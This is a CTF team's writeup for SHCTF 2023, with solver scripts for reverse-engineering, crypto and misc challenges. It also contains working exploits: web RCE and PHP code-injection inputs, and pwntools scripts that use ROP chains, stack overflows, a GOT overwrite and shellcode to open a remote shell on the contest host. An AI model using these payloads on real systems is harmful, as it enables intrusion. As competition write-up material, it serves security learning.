SHCTF 2023

UKFC 2024 SHCTF Writeup

Re

[WEEK1]easy_re

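def decode_easy_re(values):
    """Swap the two nibbles of every byte in *values* and return the result as text.

    Each entry is treated as one byte: the high nibble moves to the low
    position and the low nibble to the high position (0x66 -> 0x66 'f',
    0xC6 -> 0x6C 'l').

    Args:
        values: iterable of ints in 0..255.

    Returns:
        One character per input byte; 0x00 entries become '\\x00'.
    """
    # Same expression as the original loop so any int input maps identically.
    return ''.join(chr(((b >> 4) & 0xff) | ((16 * b) & 0xff)) for b in values)


# Byte table lifted from the binary; the tail of zero bytes is printed as-is.
a = [
  0x66, 0xC6, 0x16, 0x76, 0xB7, 0x45, 0x27, 0x97, 0xF5, 0x47,
  0x03, 0xF5, 0x37, 0x03, 0xC6, 0x67, 0x33, 0xF5, 0x47, 0x86,
  0x56, 0xF5, 0x26, 0x96, 0xE6, 0x16, 0x27, 0x97, 0xF5, 0x07,
  0x27, 0x03, 0x26, 0xC6, 0x33, 0xD6, 0xD7, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00]
print(decode_easy_re(a), end='')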

[WEEK1]ez_asm

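def decode_ez_asm(encoded):
    """Undo the challenge's per-character transform: add 0x0A, then XOR with 0x1E.

    Args:
        encoded: the string read out of the binary.

    Returns:
        The decoded text, one character per input character.
    """
    return ''.join(chr((ord(ch) + 0xa) ^ 0x1e) for ch in encoded)


s = 'nhuo[M`7mc7uhc$7midgbTf`7`$7%#ubf7 ci5Y'
print(decode_ez_asm(s), end='')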

[WEEK1]seed

#include <bits/stdc++.h>
using namespace std;
int main()
{
    // Ciphertext bytes recovered from the binary (45 bytes).
    unsigned char des[] = {
        0x40, 0x29, 0x28, 0xE9, 0xC2, 0x04, 0xA4, 0xED, 0x9F, 0x53, 0x5F, 0x75, 0x3C, 0xD1, 0xCD,
        0x2B, 0xA8, 0xC4, 0x89, 0x69, 0x15, 0x21, 0x16, 0xEF, 0xD7, 0x27, 0x92, 0xDF, 0xCA, 0x53,
        0x5F, 0x2A, 0x3C, 0xD1, 0xCE, 0x03, 0xA3, 0xEF, 0xA5, 0x78, 0x16, 0x1A, 0x2D, 0xE1, 0xC4};
    const int kKeyLen = 10;
    const int kMsgLen = 45;
    int v5[kKeyLen];

    // Key stream: the first ten outputs of the C library PRNG seeded with 0.
    // rand() output is implementation-defined, so run this on the same libc
    // as the challenge binary to reproduce its key.
    std::srand(0);
    for (int i = 0; i < kKeyLen; ++i)
        v5[i] = std::rand() % 255;

    // Undo the XOR: key byte j % 10 was applied to ciphertext byte j.
    for (int j = 0; j < kMsgLen; ++j)
        des[j] ^= v5[j % kKeyLen];

    // Emit the recovered bytes as characters, one line.
    for (int j = 0; j < kMsgLen; ++j)
        std::cout << des[j];
    std::cout << std::endl;
    return 0;
}

[WEEK1]signin

[WEEK1]easy_math

from z3 import *
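# `Solver` comes straight from `from z3 import *`; the original `z3.Solver()`
# only worked because the star import happened to re-export the submodule.
s = Solver()
# One integer unknown per flag chunk; the names are what the model prints.
l0, l1, l2, l3, l4, l5 = Ints('l0 l1 l2 l3 l4 l5')

# Linear system lifted from the binary: six equations in six unknowns.
s.add((593*l0 + 997*l1 + 811*l2 + 258*l3 + 829*l4 + 532*l5) == 0x5b8e0aef71d34ff43)
s.add((605*l0 + 686*l1 + 328*l2 + 602*l3 + 695*l4 + 576*l5) == 0x551a262360964ef7f)
s.add((373*l0 + 512*l1 + 449*l2 + 756*l3 + 448*l4 + 580*l5) == 0x49d158a5657d6931c)
s.add((560*l0 + 635*l1 + 422*l2 + 971*l3 + 855*l4 + 597*l5) == 0x625568d5abbabf4f3)
s.add((717*l0 + 507*l1 + 388*l2 + 925*l3 + 324*l4 + 524*l5) == 0x50ee0c025e70e3c23)
s.add((312*l0 + 368*l1 + 884*l2 + 518*l3 + 495*l4 + 414*l5) == 0x40e735f8aa2815f65)

# Solve
r = s.check()
if r == sat:
    print(s.model())
else:
    # model() raises when the solver is not sat, so report the verdict instead.
    print("no model:", r)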
# Every entry is already an ASCII code point; printing is a plain chr() map.
s = [0x66,0x6c,0x61,0x67,0x7b,0x4e,0x30,
0x5f,0x4f,0x6e,0x65,0x5f,0x6b,0x6e,
0x30,0x77,0x73,0x5f,0x6d,0x40,0x74,
0x68,0x5f,0x42,0x33,0x74,0x74,0x65,
0x72,0x5f,0x54,0x68,0x40,0x6e,0x5f,
0x6d,0x65,0x21,0x21,0x21,0x21,0x7d]
print(''.join(map(chr, s)), end='')

[WEEK1]ez_apk

def base58_decode(encoded, alphabet):
    """Decode *encoded* as a big-endian base-N integer over *alphabet* and return it as text.

    The radix is ``len(alphabet)`` (58 for a Base58 table, but any ordered
    alphabet works). The accumulated integer is serialised big-endian with
    no leading zero bytes, then decoded with the default (UTF-8) codec.

    Args:
        encoded: the digit string; every character must occur in *alphabet*.
        alphabet: ordered symbol table, lowest value first.

    Returns:
        The decoded text; ``''`` when *encoded* is empty.

    Raises:
        ValueError: a character is not in *alphabet* (from ``str.index``).
        UnicodeDecodeError: the resulting bytes are not valid text.
    """
    radix = len(alphabet)
    value = 0
    for symbol in encoded:
        value = radix * value + alphabet.index(symbol)

    width = (value.bit_length() + 7) // 8  # smallest byte count that holds the integer
    return value.to_bytes(width, byteorder='big').decode()


# Custom mapping table used by the app (not the standard Base58 alphabet)
custom_alphabet = "9LfnoVpi1HrzBSKxhNFeyY745R2g3QmqsTCZJuDvcMdkE8wPGbUXajtAW6"

# Encoded string taken from the app
encoded = '5TAYhycAPT1aAd535TGdWYQ8CvfoRjErGEreqhDpqv1LydTqd3mxuK2hhUp9Pws3u9mq6eX'

decoded = base58_decode(encoded, custom_alphabet)
print("Decoded:", decoded)

Web

[WEEK1]babyRCE

  • 简单过滤

[http://112.6.51.212/?rce=curl%09file:///flag-g]

[WEEK1]飞机大战

main.js

Unicode -> base64

[WEEK1]1zzphp

import requests

url = 'http://112.6.51.212:30977/?num[]=1'
# Form body as posted in the writeup: a long run of 'a' followed by the expected suffix.
data = {'c_ode': 'aaaa' * 250000 + '2023SHCTF'}

request = requests.post(url=url, data=data)
print(request.text)

[WEEK1]ezphp

?code=${phpinfo()}

pattern=\S*

Cry

[WEEK1]凯撒大帝

[WEEK1]黑暗之歌

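# The Braille block U+2800..U+28FF in code-point order, so a character's
# position in the table is the low byte of its code point.
s = [chr(0x2800 + k) for k in range(256)]
print(len(s))


def decode_braille(text):
    """Map each Braille character in *text* to chr(its position in ``s``).

    Args:
        text: string of Braille pattern characters.

    Returns:
        The decoded text, one character per input character.

    Raises:
        ValueError: a character is not in ``s`` (from ``list.index``).
    """
    return ''.join(chr(s.index(ch)) for ch in text)


t = '⠴⡰⡭⡳⠴⡰⡭⡰⡷⡲⡢⡩⡭⡡⠯⡩⡭⡡⡺⡩⡭⡡⠳⡩⡭⡡⡺⡩⡭⡡⡶⡩⡭⡡⡶⡩⡭⡡⡲⡩⡭⡡⡺⡩⡭⡡⠯⡩⡧⡊⡢⡩⡭⡡⠯⡩⡭⡡⡺⡃⡰⠫⡋⡚⡲⡍⡋⡮⠴⡰⡭⡶⡷⡲⡢⡩⡧⡊⡢⡃⡴⡵⡋⡁⡬⡵⡋⡁⡬⡵⡋⡁⡬⡳⡋⠲⠴⡯⡃⡗⠴⡰⡭⡴⠴⡰⡭⡶⡷⡲⡢⡩⡧⡊⡢⡩⡭⡡⡺⡩⡭⡡⡺⡩⡭⡡⠳⡩⡧⡊⡢⡩⡭⡡⠯⡩⡧⡊⡢⡃⡴⡵⡋⡚⡱⠫⡋⡚⡱⠫⡋⡚⡲⠵⠲⡺⠰⠽'
print(decode_braille(t), end='')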

[WEEK1]小兔子可爱捏

  • 宇宙的终极答案是 42

flag{i_love_technology}

[WEEK1]okk

[WEEK1]迷雾重重

[WEEK1]进制

  • 两次 16 进制转文字

flag{ahfkjlhkah}

[WEEK1]what is m

from Crypto.Util.number import bytes_to_long, long_to_bytes

print(long_to_bytes(7130439814057443337513081734473405090739779942575066260183826302073352109596131283637502871686512272788977886248607350692603913512995544061446958261011864073931428103911524197607344103371901))

[WEEK1]really_ez_rsa

from Crypto.Util.number import *
# Both primes are given outright and are only ~128 bits each, far below any real RSA size.
p = 217873395548207236847876059475581824463
q = 185617189161086060278518214521453878483
c = 6170206647205994850964798055359827998224330552323068751708721001188295410644
e = 65537

n = p * q
phi = (p - 1) * (q - 1)
d = inverse(e, phi)  # private exponent: e * d == 1 (mod phi)

# m = c^d mod n, rendered as bytes
m = pow(c, d, n)
print(long_to_bytes(m))

[WEEK1]残缺的md5

import hashlib
import itertools

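s = 'ABCDEFGHJKLMNPQRSTUVWXYZ0123456789'
key1 = 'KCLWG'
key2 = 'K8M9O3'
key3 = 'DE'
key4 = '84S9'


def _md5_hex_upper(text):
    """Return the upper-case hex MD5 digest of *text* encoded as UTF-8."""
    return hashlib.md5(text.encode('utf-8')).hexdigest().upper()


def search(charset, fragment):
    """Yield the digests of every key1+i+key2+j+key3+k+key4 candidate that contain *fragment*.

    i, j and k each range over *charset*. The digest is computed once per
    candidate (the original hashed and hex-encoded it twice). *fragment* is
    matched case-sensitively against the upper-case digest, so pass it upper-case.

    Args:
        charset: characters to try in each of the three unknown positions.
        fragment: hex fragment of the known digest.

    Yields:
        Upper-case hex digests of the matching candidates.
    """
    for i, j, k in itertools.product(charset, repeat=3):
        digest = _md5_hex_upper(key1 + i + key2 + j + key3 + k + key4)
        if fragment in digest:
            yield digest


for match in search(s, 'B2AC4E6'):
    print(match)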

[WEEK1]熊斐特

[WEEK1]难言的遗憾

[WEEK2]ez_rsa

  • 常规 RSA+RSA 共模

[WEEK2]e?

  • 有限域开方 + 中国剩余定理
# Challenge parameters. Per the note above, m is recovered by taking e-th
# roots of c modulo p and modulo q separately, then combining them with CRT.
p= 70724362259337647663584082414795381346569735601816096923682814277857463878289
q= 114427188167532721707398034034072867253267857672869034942206947096293901917007
e= 1314
c= 4308122681135507736058122041934864039713319497673888928736468819190185301630702240416683093700232966794026900978699666246019059398861283337865339404916304

# Sage: univariate polynomial ring over Z/pZ; in Sage syntax `^` is exponentiation.
R.<x> = Zmod(p)[]
f = x ^ e - c
f = f.monic()
res1 = f.roots()  # e-th roots of c mod p, as (root, multiplicity) pairs

# Same computation modulo q.
R.<y> = Zmod(q)[]
f = y ^ e - c
f = f.monic()
res2 = f.roots()
print(res1)
print(res2)
from math import gcd, sqrt

import libnum
from Crypto.Util.number import *
p = 70724362259337647663584082414795381346569735601816096923682814277857463878289
q = 114427188167532721707398034034072867253267857672869034942206947096293901917007
e = 1314
c = 4308122681135507736058122041934864039713319497673888928736468819190185301630702240416683093700232966794026900978699666246019059398861283337865339404916304
n = p * q

# e-th roots of c modulo p and modulo q from the Sage step, as (root, multiplicity) pairs.
res1 = [(70724362259295513136647378065715849276316693089744659699199524218118849318420, 1), (42134526936704349079532070253042512071437224483290059738614559869, 1)]
res2 = [(114427188167490587180461329684993335183014815160797597717723657036555287357138, 1), (42134526936704349079532070253042512071437224483290059738614559869, 1)]

# Combine every pair of roots with the CRT into a candidate m modulo p*q and
# keep the one whose byte form carries the flag prefix.
for root_p, _ in res1:
    for root_q, _ in res2:
        m = libnum.solve_crt([int(root_p), int(root_q)], [p, q])
        flag = long_to_bytes(m)
        if flag.startswith(b'flag'):
            print(flag)

[WEEK2]factorizing_n

  • n = p ** 5
  • yafu 分解直接逆
from Crypto.Util.number import *
c = 52409805591744226507807531465616894934028463651864630447934395956954575834603756391651746535033902964658694070544877880970130028487381287088425209448038533705903737694267359561133766799228825599943891152463160326583722749586721691729062524310148743637505134465210906856660867852927837112666513674858029892207902196213784902541173835447263733760225682942461048573387925463479672527491229113710629340960375692432470493054415657845868577650170648157402682163577152288432313996310562452677399267755695644659367792066311336521698894993982901657735586844358679888210537898629281625526455444811591386493005341435516094660429968084363084301878446471676122069724608083578102382181382107225473535696274374370868301830807644939881080301668756603163431000745972823980427048672732291
e = 65537
# n = p**5 (see the note above); only the single prime factor is needed below.
p = 11776588228599764849559519654482976956833367474471407292255776713760090338489966385328569279135095351660161277221351884258247731394014018172166064062551483

# Decrypt modulo p alone; this only recovers m when m < p — TODO confirm for this challenge.
phi = p - 1
d = inverse(e, phi)
m = pow(c, d, p)
print(long_to_bytes(m))

[WEEK2]easymath

  • LCG 已知连续 6 位,直接脚本解 abm 计算下一位即可

[WEEK2]XOR

  • 已知 p+q 和 p ^ q,逐字节爆破求解 pq

[WEEK2]哈希猫

  • 就是爆破 hash 值

Misc

[WEEK1]签到题

base64+64

[WEEK1]Steganography

  • 属性详细信息和下图,组合得到密钥解密

[WEEK1]可爱的派蒙捏

binwalk 分离 zip,然后读取两个文件的差异字节组成字符串

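def compare_files(file1_path, file2_path):
    """Return the characters at which two text files differ, position by position.

    Both files are read whole (text mode, default encoding) and compared
    index by index over their common prefix; at every position where they
    differ, the character from the first file is appended to the first
    result and the one from the second file to the second result.

    Args:
        file1_path: path of the first file.
        file2_path: path of the second file.

    Returns:
        ``(chars_from_file1, chars_from_file2)``: two strings of equal
        length, both empty when the files agree on their common prefix.
        Any tail beyond the shorter file is ignored (the original raised
        IndexError when the second file was longer than the first).
    """
    with open(file1_path, 'r') as file1:
        content1 = file1.read()
    with open(file2_path, 'r') as file2:
        content2 = file2.read()

    # zip() stops at the shorter file, and list+join avoids quadratic string growth.
    unique_to_file1 = []
    unique_to_file2 = []
    for ch1, ch2 in zip(content1, content2):
        if ch1 != ch2:
            unique_to_file1.append(ch1)
            unique_to_file2.append(ch2)
    return ''.join(unique_to_file1), ''.join(unique_to_file2)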

# Paths of the two files to compare (replace with your own)
file1_path = 'txt1.txt'
file2_path = 'txt2.txt'

unique1, unique2 = compare_files(file1_path, file2_path)
print(unique1)
print(unique2)

#dd8eg50c904def68d3db4bdlf8
#flag{4ebf327905288fca947a}

[WEEK2]奇怪的 screenshot

  • win11 截图 CVE + 百家姓加密

https://github.com/frankthetank-music/Acropalypse-Multi-Tool

Pwn

[WEEK1]nc

连上就有

[WEEK1] 四则计算器

绕过 strlen + backdoor 地址

[WEEK1]猜数游戏

常规猜测问题 服务器有延迟 多试几次就行

from pwn import *
import ctypes
import os
import time

# Load the C library so this script can call the same srand()/rand() the target uses
libc = ctypes.CDLL("/lib/x86_64-linux-gnu/libc.so.6")

# Connect to the remote challenge instance
r = remote('112.6.51.212',31354)
#r = process("./guess")

# Seed with the current second; presumably the target seeds from time() as well
# (the note above says the server lags, so re-run if the seconds do not line up)
seed = int(time.time())
libc.srand(seed)

# pwntools context
context(os='linux', log_level='debug', arch='amd64')

r.sendlineafter(b"number?",str(11))
r.sendlineafter(b"\n",str(libc.rand()))
# send the option, then hand the session over to the user


r.interactive()

[WEEK1]hard nc

第一段 flag

ls -a
cat .gift

第二段 进入 gift2 获取 flag2 base64 解码即可

[WEEK1]ropchain

静态链接

ROPgadget --binary elf --ropchain 就给 rop 链

from pwn import*
r = remote("112.6.51.212", 31399)

# execve chain produced by ROPgadget for this static binary; the gadget
# addresses are the ones from the generated script, unchanged.
# struct.pack is imported here on purpose: it shadows the pack() that
# `from pwn import *` brings in, exactly as the generated script did.
from struct import pack

# Padding goes here
p = b'a' * 0x28

POP_RSI = pack('<Q', 0x000000000040a30d)      # pop rsi ; ret
POP_RAX = pack('<Q', 0x0000000000419a1c)      # pop rax ; ret
POP_RDI = pack('<Q', 0x0000000000401d1d)      # pop rdi ; ret
POP_RDX = pack('<Q', 0x0000000000401858)      # pop rdx ; ret
MOV_RSI_RAX = pack('<Q', 0x000000000041ac41)  # mov qword ptr [rsi], rax ; ret
XOR_RAX = pack('<Q', 0x0000000000417e25)      # xor rax, rax ; ret
ADD_RAX_1 = pack('<Q', 0x0000000000450860)    # add rax, 1 ; ret
SYSCALL = pack('<Q', 0x0000000000401243)      # syscall
DATA = pack('<Q', 0x000000000049d0c0)         # @ .data
DATA_8 = pack('<Q', 0x000000000049d0c8)       # @ .data + 8

chain = [
    # store "/bin//sh" at .data
    POP_RSI, DATA,
    POP_RAX, b'/bin//sh',
    MOV_RSI_RAX,
    # store a zero qword at .data + 8
    POP_RSI, DATA_8,
    XOR_RAX,
    MOV_RSI_RAX,
    # rdi = .data, rsi = rdx = .data + 8
    POP_RDI, DATA,
    POP_RSI, DATA_8,
    POP_RDX, DATA_8,
    # rax = 0, then incremented 59 times below
    XOR_RAX,
]
chain += [ADD_RAX_1] * 59
chain.append(SYSCALL)
p += b''.join(chain)

r.sendline(p)
r.interactive()

[WEEK1]口算题

[WEEK1]babystack

给出了 hint 地址 0x400858

from pwn import *
r = remote("112.6.51.212", 31513)
# Padding goes here         .rodata:0000000000400858 unk_400858      db  24h ; $
# 0x28 bytes of filler, then the four addresses in the order the writeup uses
# (0x400858 is the hint address noted above).
p = b'a' * 0x28 + b''.join(p64(addr) for addr in (0x400581, 0x400833, 0x400858, 0x4005D0))

r.sendline(p)
r.interactive()

[WEEK1]showshowway

gdb 调试

输入位置和覆盖位置存在偏移 0x1100-0x10C0=0x40

再覆盖 y 的值==p

from pwn import*
r = remote("112.6.51.212", 31521)
#r=process("")
# 0x40 filler bytes cover the offset noted above, then the value written over y.
payload = b'a' * 0x40 + b'showshowway'
r.sendline(payload)
r.interactive()

[WEEK1]pkmon

整数溢出 + 修改 put 的 got 表

from pwn import *
r = remote("112.6.51.212", 31650)
elf = ELF("./pkmon")
# First the integer value from the writeup, then the address written over put's GOT entry.
r.sendline(str(536870895))
r.sendline(p64(0x40072F))
r.interactive()

[WEEK2]easy_shellcode

from pwn import*
context.arch = 'amd64'
context(os='linux', log_level='debug')
p = remote('112.6.51.212', 30749)
#p=process("./shellcode")
elf = ELF('./shellcode')
#libc=elf.libc


def debug():
    """Attach gdb to the running target and pause until the user continues."""
    gdb.attach(p)
    pause()


# 0xf filler bytes plus one marker byte; recvuntil() below waits for the marker.
payload = b'a' * 0xf + b'b'
p.send(payload)
p.recvuntil(b'b')
# Six leaked bytes follow the marker: pad to a qword, unpack, and apply the
# -0x80 adjustment the writeup uses.
stack = u64(p.recv(6).ljust(8, b'\x00')) - 0x80
print(hex(stack))

# Shellcode padded to 0x78 bytes, followed by the computed address.
payload = asm(shellcraft.sh()).ljust(0x78, b'a') + p64(stack)
p.sendline(payload)
p.interactive()
Licensed under CC BY-NC-SA 4.0